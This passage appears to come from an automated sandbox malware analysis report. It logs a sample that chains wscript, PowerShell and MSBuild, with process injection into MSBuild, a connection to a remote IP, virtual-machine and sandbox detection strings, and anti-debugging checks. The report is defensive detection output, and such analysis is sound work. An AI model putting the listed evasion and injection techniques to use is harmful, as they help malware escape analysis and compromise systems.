          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3380000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599859Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599750Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599509Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599396Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599250Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599127Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598885Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598778Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598586Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598412Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597765Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597635Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3792Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6009Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 964Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1790Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 404Thread sleep count: 964 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599859s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 404Thread sleep count: 1790 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599750s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599509s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599396s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599250s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599127s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -598885s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -598778s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -598586s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -598412s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -598094s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -597875s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -597765s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2128Thread sleep time: -597635s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6776Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599859Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599750Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599509Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599396Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599250Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599127Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598885Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598778Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598586Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598412Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597765Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597635Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook.dll
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever.dll
          Source: MSBuild.exe, 00000007.00000002.2104914509.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: samonokoqemulef
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHookLR^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: @
          Source: wscript.exe, 00000000.00000003.1735276479.0000020A01DDE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737195665.0000020A01DDE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737195665.0000020A01D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000002.1737195665.0000020A01D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
          Source: MSBuild.exe, 00000007.00000002.2104914509.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: soqemujujeyorakesix
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.00000000037CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: False
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmouseverLR^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR^qhsv
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
          Source: MSBuild.exe, 00000007.00000002.2109306730.000000000161C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll "
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05941680 CheckRemoteDebuggerPresent,7_2_05941680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
